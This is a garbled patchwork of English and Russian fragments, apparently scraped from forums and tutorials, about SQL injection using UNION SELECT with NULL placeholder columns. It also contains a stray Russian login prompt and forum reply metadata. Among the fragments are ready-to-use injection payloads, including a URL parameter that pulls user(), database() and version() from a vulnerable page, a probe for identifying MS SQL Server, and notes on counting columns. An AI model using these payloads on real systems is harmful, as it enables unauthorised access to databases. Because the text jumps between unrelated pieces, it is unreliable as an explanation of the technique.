Union select null, null, null, null, null, null, null from information_schema.tables. for a small database containing three tables. this instruction is used in sql injection I tried it and it worked but I didn't really know how it works can somebody help me...
Number of null-s on change between passed and failed queries is the one attacker looks for.
...SELECT NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
Войдите сейчас, чтобы увидеть свои каналы и рекомендации!
if null = null select 'nulls are equal' else select 'nulls are not equal'. приводит к 'nulls are not equal' Я использовал = вместо is null или is not null здесь, чтобы подчеркнуть тот факт, что два нуля не могут сравниться. Приходя к UNION, UNION предполагается устранить повторяющиеся значения.
С учетом хранения null-ов и их неиндексируемости - издержки на хранение минимальные. 24 мар 11, 00:27 [10416524] Ответить | Цитировать Сообщить модератору.
/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,1 3,14,15–. As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column?
11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –- Если нет ошибки, значит синтаксис верный, т.е. используется MS SQL Server.
Вывод имён колонок (MySQL >= 4.1 колонки NOT NULL).